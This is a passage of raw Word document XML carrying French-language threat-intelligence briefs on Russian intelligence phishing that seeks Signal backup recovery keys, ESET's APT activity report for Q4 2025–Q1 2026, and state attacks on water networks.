            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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menées par les services de renseignement russes visant les comptes Signal et les auteurs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09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3906543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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de ces attaques ont ajouté une nouvelle étape : ils incitent désormais leurs cibles à leur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19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4090693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3808575" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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857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communiquer leur clé de récupération de sauvegarde Signal.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29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4363743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Il suffit de la communiquer une seule fois pour que l’attaquant puisse restaurer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40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4547893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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sauvegarde du compte, consulter l’historique des messages privés et de groupe, et prendre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50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4732043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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le contrôle du compte. Pire encore, la clé reste valide. Si vous créez un nouveau compte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60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4916193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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avec le même numéro de téléphone, l’ancienne clé pourra toujours être utilisée contre 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70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5100343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2030473" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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04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nouveau compte, prévient l’avis.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81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5373393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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La solution est simple : générer une nouvelle clé dans les paramètres, ce qui rendra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391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5557543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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l’ancienne inutilisable pour les futurs téléchargements de sauvegarde et accepter que toutes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01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5741693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3746687" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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466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données déjà récupérées par l’attaquant soient perdues.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11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6014743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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L’avis mis à jour, PSA I-062626-PSA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49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, ajoute deux noms de suivi publics qui manquaient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22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6198893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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dans l’avis de mars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50</w:t>
                        </w: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 : UNC5792 et UNC4221. Le FBI attribue cette activité à plusieurs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3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6383043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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groupes des services de renseignement russes (RIS), notamment des agents du FSB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4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6567193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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infiltrés au sein des gardes-frontières du FSB et d’autres travaillant pour les forces armées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52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6751343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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russes. La campagne vise les comptes Signal et WhatsApp ; la nouvelle tactique liée à la clé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63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6935493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4211749" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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1174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récupération décrite dans l’avis concerne spécifiquement Signal.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7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7208543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Les cibles sont des personnes présentant un grand intérêt sur le plan du renseignement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8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7392693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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des responsables gouvernementaux américains et internationaux, actuels ou anciens,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9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7576843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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militaires, des personnalités politiques, des journalistes et des responsables ukrainiens.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0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7760993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">L’avis publié en mars indiquait que cette campagne de grande envergure avait déjà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1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7945143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3450663" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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506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compromis des milliers de comptes à travers le monde.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2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8218193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Le message de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phishing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 se fait passer pour le service d’assistance de Signal. Les vagues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3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8402343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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précédentes demandaient des codes de vérification par SMS et des codes PIN de compte,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4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8889387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5501296" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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129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46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https://www.cisa.gov/resources-tools/resources/russian-intelligence-services-target-commercial-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5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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1849179" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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917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messaging-application-accounts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6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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2530766" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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076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47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https://www.ic3.gov/PSA/2026/PSA260626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7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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4626901" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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2690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48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https://thehackernews.com/2026/03/fbi-warns-russian-hackers-target-signal.html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8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2530766" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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076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49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https://www.ic3.gov/PSA/2026/PSA260626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9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2530766" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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076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50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https://www.ic3.gov/PSA/2026/PSA260320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064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166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26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371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473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5678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5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8832" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>885190</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3003547</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3069590" cy="3257549"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="512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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-20" r="0" t="-19" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3069590" cy="32575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69590" h="3257549">
                          <a:moveTo>
                            <a:pt x="3069590" y="3257549"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3069589" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3257549"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3069589" y="325754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9856" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3954779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3446777</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2691130" cy="2192020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5130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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-23" r="-23" t="-28" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2691130" cy="21920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1130" h="2192020">
                          <a:moveTo>
                            <a:pt x="0" y="2192020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2691130" y="2192020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2691130" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="219202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088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190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2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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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ou utilisaient des liens d’invitation à rejoindre un groupe falsifiés qui reliaient discrètement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3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1144928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2291534" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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153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l’appareil de l’attaquant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51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au compte.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4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1691028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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La version mise à jour guide la cible pour qu’elle active les sauvegardes Signal, ouvre la clé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6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1875178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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de récupération et la colle dans la conversation. L’alerte présente deux exemples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7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2059328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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messages : l’un se faisant passer pour la mise en place obligatoire de l’authentification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8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2243478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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deux facteurs, l’autre pour une solution urgente de récupération de données concernant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9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2427628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2807853" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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78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messages prétendument menacés de perte.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0096" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2291715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6237625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3015020" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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502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27 – Exemples de messages de phishing sur Signal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1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6763408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Comme en mars, les agences précisent clairement qu’aucune de ces failles ne permet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21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6947558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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contourner le chiffrement de Signal ni de compromettre l’application elle-même. Les pirates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31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7131708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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compromettent des comptes individuels par le biais de techniques d’ingénierie sociale, puis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41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7315858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4428703" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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870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s’introduisent dans le système en exploitant une fonctionnalité légitime.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52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7588908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Parallèlement à cette mise à jour, le programme "Rewards for Justice"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52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du Département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62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7773058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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d’État américain offre jusqu’à 10 millions de dollars pour toute information concernant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72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7957208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="687816" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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8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UNC5792.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82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4570386" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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038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51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https://thehackernews.com/2025/02/hackers-exploit-signals-linked-devices.html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93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2713646" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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364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52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https://rewardsforjustice.net/rewards/unc5792/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0336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136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238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3408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443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597504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5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8528" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1366520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4827270" cy="2828290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="515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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-13" r="-13" t="-22" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4827270" cy="28282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27270" h="2828290">
                          <a:moveTo>
                            <a:pt x="0" y="2828290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4827270" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4827270" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="282829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955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057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00" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1463040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3795415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4671911" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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71911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Figure 28 – Offre de 10 millions de dollars pour des informations sur UNC4221 et UNC5792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26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4048148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Cette activité recoupe les alertes émises plus tôt cette année par les services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3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4232298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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renseignement néerlandais (AIVD et MIVD), les agences allemandes BfV et BSI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53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, ainsi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4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4416448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834263" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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2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l'ANSSI. Le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Threat Intelligence Group</w:t>
                        </w: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 de Google a été le premier à signaler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54</w:t>
                        </w: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, début 2025,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5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4600598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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que le groupe UNC5792 exploitait la fonctionnalité de périphériques associés de Signal et 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6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4784748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5725259" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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25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ensuite constaté que ces mêmes techniques étaient utilisées contre WhatsApp et Telegram.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7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4767871" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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787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53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https://thehackernews.com/2026/02/german-agencies-warn-of-signal-phishing.html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8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5163476" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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347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54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https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/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979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081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1840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2864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38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621056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8851274</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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2080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3104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41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947310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4876438" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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76438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[Brève] Rapport ESET sur l’activité des APT – T4 2025 à T1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5152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1313838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">16 juin 2026</w:t>
                        </w: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 : Aperçu des activités de certains groupes APT analysés par ESET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6176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1487193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4566854" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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68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Research entre le quatrième trimestre 2025 et le premier trimestre 2026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7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2037103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Synthèse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8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2485413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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48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 rapport </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ESET APT Activity Report Q4 2025-Q1 2026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présente les principales activités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9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2669563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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groupes d'APT observés et analysés par les chercheurs d’ESET entre octobre 2025 et mars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0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2853713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="385366" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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536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2026.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1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3126763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Les opérations mises en dans leur rapport illustrent les tendances et évolutions majeures du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2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3300118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3172101" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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210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paysage des menaces étudié durant cette période.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33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3562373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Les acteurs alignés sur la Russie ont continué à concentrer l’essentiel de leurs opérations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4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3735728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4180037" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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003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sur l’Ukraine et sur les entités liées aux efforts de défense du pays.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5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3997983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Sednit a déployé ses implants Covenant et BeardShell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56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 contre des militaires ukrainiens, des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6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4171338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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fabricants de drones, des organisations impliquées dans la recherche et le développement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7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4344693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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 drones, tout en ciblant également des entreprises de logistique et de transport en dehors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8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4518048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811590" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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5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de l’Ukraine.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9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4780303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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 son côté, Sandworm a intensifié ses activités destructrices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57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durant l’hiver, en déployant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0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4953658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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plusieurs nouveaux wipers en Ukraine contre des cibles gouvernementales et du secteur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1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5127013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377123" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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1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privé.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2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5389268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Un incident particulièrement marquant s’est produit en décembre 2025 : une attaque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35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5562623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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destruction de données a touché une entreprise énergétique polonaise. ESET attribue cette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4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5735978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3746268" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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462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opération à Sandworm avec un niveau de confiance moyen.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5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5998233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Bien que les attaques destructrices menées par des acteurs liés à la Russie en dehors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6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6171588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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l’Ukraine restent rares, ce cas se distingue car il a affecté une infrastructure critique située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7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6344943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2092360" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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236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dans un État membre de l’OTAN.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87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6607198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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Compte tenu du rôle de la Pologne dans la stabilisation de l’approvisionnement électrique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97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6780553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ukrainien, il est possible que cette opération ait eu pour objectif de fragiliser le réseau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07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6953908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3086465" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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646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électrique ukrainien pendant la période hivernale.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17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8889387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5720371" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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037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55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https://www.welivesecurity.com/fr/dernieres-recherches/rapport-eset-sur-lactivite-des-apt-t4-2025-a-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28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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="501560" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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56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t1-2026/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38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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5268886" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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6888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56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https://www.eset.com/fr/about/newsroom/press-releases/recherche/sednit-modernise-outils-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48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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1489112" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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911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espionnage-cible-ukraine/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58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5459386" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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938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57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https://www.welivesecurity.com/en/eset-research/eset-research-sandworm-cyberattack-poland-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68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1241970" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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197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power-grid-late-2025/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792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8944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996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099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2016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66816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8997324</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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49">
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1828800" y="6349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9184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0208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12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947310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5543131" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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3131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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[Brève] Rapport sur les attaques menées par des États contre les réseaux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22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1198770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3058407" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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8407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28"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d'approvisionnement en eau : 2024-2026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3280" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1129664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1840253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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069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19"/>
                          </w:rPr>
                          <w:t xml:space="preserve"></w:t>
                        </w:r>
                        <w:r>
